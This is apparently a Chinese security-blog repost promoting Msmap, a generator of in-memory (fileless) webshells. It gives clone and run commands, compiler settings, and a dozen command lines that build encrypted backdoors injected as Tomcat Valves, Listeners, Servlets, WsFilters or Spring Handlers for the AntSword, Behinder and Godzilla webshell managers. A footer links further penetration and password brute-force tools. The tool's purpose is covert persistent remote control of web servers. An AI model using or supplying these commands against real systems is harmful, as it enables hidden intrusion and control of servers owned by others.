Msmap ：一个内存 WebShell 生成器

Msmap 是一个内存 WebShell 生成器。 兼容各种容器、组件、编码器、

WebShell/代理/杀手

和 管理客户端。

用法

          
git clone git@github.com:hosch3n/msmap.git
          
cd msmap
          
python generator.py
      

编辑 config/environment.py

          
# Auto Compile
          
auto_build = True
          

          
# Base64 Encode Class File
          
b64_class = True
          

          
# Generate Script File
          
generate_script = True
          

          
# Compiler Absolute Path
          
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
          
dotnet_compiler_path = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
      

编辑 gist/java/container/tomcat/servlet.py

          
// Servlet Path Pattern
          
private static String pattern = "*.xml";
      

如果在 WsFilter 中使用加密编码器，则密码需要与路径相同（例如 /passwd ）

gist/java/container/jdk/javax.py with lib/servlet-api.jar 可以根据目标容器进行替换。

pip3 install pyperclip 支持自动复制到剪贴板。

Example

CMD / SH

Command with Base64 Encoder | Inject Tomcat Valve

python generator.py Java Tomcat Valve Base64 CMD passwd

AntSword Type JSP with default Encoder | Inject Tomcat Valve

python generator.py Java Tomcat Valve RAW AntSword passwd

Type JSP with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat Listener

python generator.py Java Tomcat Listener AES128 AntSword passwd

Type JSP with rc_4_sha256 Encoder | Inject Tomcat Servlet

python generator.py Java Tomcat Servlet RC4 AntSword passwd

Type JSP with xor_md5 Encoder | AgentFiless Inject HttpServlet

python generator.py Java JDK JavaX XOR AntSword passwd

Type JSPJS with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat WsFilter

python generator.py Java Tomcat WsFilter AES128 JSPJS passwd

Type JSPJS with xor_md5 Encoder | Inject Spring Handler

python generator.py Java Spring Handler XOR JSPJS passwd

Behinder Type default_aes | Inject Tomcat Valve

python generator.py Java Tomcat Valve AES128 Behinder rebeyond

Type default_xor_base64 | Inject Spring Interceptor

python generator.py Java Spring Interceptor XOR Behinder rebeyond

Godzilla Type JAVA_AES_BASE64 | Inject Tomcat Valve

python generator.py Java Tomcat Valve AES128 Godzilla superidol

Type JAVA_AES_BASE64 | AgentFiless Inject HttpServlet

python generator.py Java JDK JavaX AES128 Godzilla superidol

Type JAVA_AES_BASE64 | Inject Spring Handler

python generator.py Java Spring Handler AES128 Godzilla superidol

项目地址

https://github.com/hosch3n/msmap

如有侵权，请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell

「 超详细 | 分享 」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具｜无状态子域名爆破工具（1秒扫160万个子域）

查看更多精彩内容，还请关注 橘猫学安全

每日坚持学习与分享，觉得文章对你有帮助可在底部给点个“ **再看

”**